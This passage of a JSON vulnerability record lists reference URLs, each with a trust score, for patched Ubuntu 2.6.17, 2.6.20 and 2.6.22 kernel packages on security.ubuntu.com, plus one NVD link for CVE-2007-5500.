        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/message-modules-2.6.22-14-386-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12_2.6.17.1-12.42_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-generic-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-sparc64-di_2.6.20-16.33_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-powerpc64-smp_2.6.17.1-12.42_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-powerpc-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-386-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-debug-2.6.22-14-386_2.6.22-14.47_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-16-generic-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-sparc64-smp_2.6.17.1-12.42_sparc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-generic-di_2.6.20-16.33_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-generic_2.6.17.1-12.42_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-modules-2.6.22-14-powerpc-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ppp-modules-2.6.22-14-386-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-sparc64-di_2.6.17.1-12.42_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-generic-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-cell_2.6.22-14.47_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-generic-di_2.6.20-16.33_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-generic-di_2.6.20-16.33_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-sparc64-di_2.6.20-16.33_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pata-modules-2.6.22-14-cell-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-powerpc-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/serial-modules-2.6.22-14-generic-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-5500"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-shared-modules-2.6.22-14-sparc64-di_2.6.22-14.47_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-386_2.6.20-16.33_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-secondary-modules-2.6.22-14-generic-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-powerpc_2.6.20-16.33_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-generic_2.6.20-16.33_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-generic-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-powerpc-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-sparc64-di_2.6.20-16.33_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-386-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-generic-di_2.6.17.1-12.42_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-powerpc-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-386-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/serial-modules-2.6.22-14-386-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-generic-di_2.6.17.1-12.42_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-server_2.6.20-16.33_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-386-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-powerpc-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/irda-modules-2.6.22-14-386-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ipv6-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-generic-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-14-generic_2.6.22-14.47_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/plip-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-generic-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/message-modules-2.6.22-14-generic-di_2.6.22-14.47_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ppp-modules-2.6.22-14-generic-di_2.6.22-14.47_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-386-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.22/linux-image-2.6.22-14-rt_2.6.22-14.47_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fat-modules-2.6.22-14-sparc64-di_2.6.22-14.47_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pata-modules-2.6.22-14-generic-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-powerpc-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-libc-dev_2.6.20-16.33_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-generic-di_2.6.20-16.33_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/block-modules-2.6.22-14-generic-di_2.6.22-14.47_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-generic-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/irda-modules-2.6.22-14-cell-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-generic-di_2.6.17.1-12.42_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-powerpc-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pata-modules-2.6.22-14-sparc64-di_2.6.22-14.47_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-generic-di_2.6.20-16.33_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-powerpc-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-libc-dev_2.6.17.1-12.42_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-source-2.6.22_2.6.22-14.47.dsc"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-libc-dev_2.6.20-16.33_sparc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-powerpc-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-sparc64-di_2.6.17.1-12.42_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-shared-modules-2.6.22-14-generic-di_2.6.22-14.47_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fat-modules-2.6.22-14-powerpc-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-powerpc-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-16-386-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-pcmcia-modules-2.6.22-14-cell-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/crypto-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-generic-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/cdrom-modules-2.6.20-16-generic-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-server-bigiron_2.6.17.1-12.42_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-server_2.6.20-16.33_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/floppy-modules-2.6.22-14-386-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/kernel-image-2.6.22-14-generic-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/scsi-modules-2.6.22-14-powerpc-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-source-2.6.22_2.6.22-14.47_all.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-powerpc-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.22/linux-image-2.6.22-14-rt_2.6.22-14.47_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ipv6-modules-2.6.22-14-powerpc-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-secondary-modules-2.6.22-14-386-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-source-2.6.17_2.6.17.1-12.42_all.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-powerpc-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-generic-di_2.6.20-16.33_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-storage-modules-2.6.22-14-generic-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-generic-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/usb-modules-2.6.22-14-386-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/md-modules-2.6.22-14-powerpc-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-generic-di_2.6.17.1-12.42_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fat-modules-2.6.22-14-386-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/kernel-image-2.6.22-14-386-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-generic-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ipv6-modules-2.6.22-14-sparc64-di_2.6.22-14.47_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-generic-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-generic-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ntfs-modules-2.6.17-12-generic-di_2.6.17.1-12.42_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fs-common-modules-2.6.17-12-powerpc-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-modules-2.6.22-14-generic-di_2.6.22-14.47_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/kernel-image-2.6.22-14-sparc64-di_2.6.22-14.47_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pata-modules-2.6.22-14-generic-di_2.6.22-14.47_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fat-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-powerpc-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-generic-di_2.6.20-16.33_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/plip-modules-2.6.22-14-cell-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-lowlatency_2.6.20-16.33_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-libc-dev_2.6.22-14.47_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-generic-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-powerpc-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/parport-modules-2.6.22-14-cell-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ide-modules-2.6.22-14-386-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/crypto-modules-2.6.22-14-generic-di_2.6.22-14.47_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-generic-di_2.6.17.1-12.42_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-server-bigiron_2.6.20-16.33_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/crypto-modules-2.6.22-14-cell-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ppp-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-generic_2.6.22-14.47_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-386-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-generic-di_2.6.17.1-12.42_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12_2.6.17.1-12.42_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-386-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/block-modules-2.6.22-14-powerpc-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-386-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/floppy-modules-2.6.22-14-cell-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/input-modules-2.6.22-14-powerpc-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-sparc64-di_2.6.20-16.33_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-386-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/acpi-modules-2.6.17-12-386-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/crypto-modules-2.6.22-14-sparc64-di_2.6.22-14.47_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-generic-di_2.6.20-16.33_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-386-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-lowlatency_2.6.20-16.33_i386.deb"
